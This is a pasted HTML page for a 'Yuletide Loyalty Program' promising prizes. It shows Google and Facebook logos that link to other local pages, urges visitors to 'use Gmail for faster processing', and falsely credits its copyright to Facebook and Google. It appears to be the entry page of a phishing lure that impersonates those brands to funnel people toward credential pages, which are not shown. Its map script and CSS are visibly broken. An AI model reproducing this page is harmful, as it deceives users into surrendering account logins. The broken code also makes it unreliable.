Untitled
3 years ago in Plain Text
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<meta viewport="mobile" scale="1.0">
<style>
h1 {
background-color:black;
  border-top-color:red;
    border-right-style: solid;
    border-bottom-style: dotted;
    border-left-style: solid;
border-style:dotted;
text-shadow:2px 2px red;
color:white;
text-align:center;
font-weight:bold;
font-size:25px;
font-family:'Arial' 'Times', sans serif;
}
i {
font-family: 'Arial', sans-serif;
font-weight: 700;
height: 36px;
padding: 0 8px;
/* border-radius: 3px; */
/* -webkit-user-select: none;
user-select: none; */
img {
padding:0 8px;
}
p {
font-family: 'Helvetica',sans serif;
float:right;
text-align:center;
}
strong {
font-family: 'Arial',sans serif;
color:yellow;
}
body {
background-color:#F7F7F7
}
</style>
<head>
<title>YULE STOCKER-win big!</title>
<h1>Yuletide Loyalty Program</h1>
</head>
<body>
<i>sponsored by:</i>
click me⬇
<a href="index2.html"><img src="googlelogo.png" alt=""></a>
<a href="index.html"><img src="fac.jpg" alt="" style="width:28px;height:27px"></a>
<p>we have only Google mail and Facebook.Other Options will come sooner.
</p>
<strong>USE GMAIL FOR FASTER PROCESSING!</strong>
<div id="googleMap" style="width:100%;height:400px;"></div>
<script>
function myMap() {
var mapProp= {
  center:newgoogle.maps.LatLng(51.508742,-0.120850),
  zoom:5,
};
var map = new google.maps.Map(document.getElementById("googleMap"),mapProp);
}
var marker = new google.maps.Marker({
  position:myCenter,
  icon:'pinkball.png'
});
marker.setMap(map);
</script>
<script src="https://maps.googleapis.com/maps/api/js?key=YOUR_KEY&callback=myMap"></script>
</body>
<footer>◎Copyright of Facebook And Google</footer>
</html>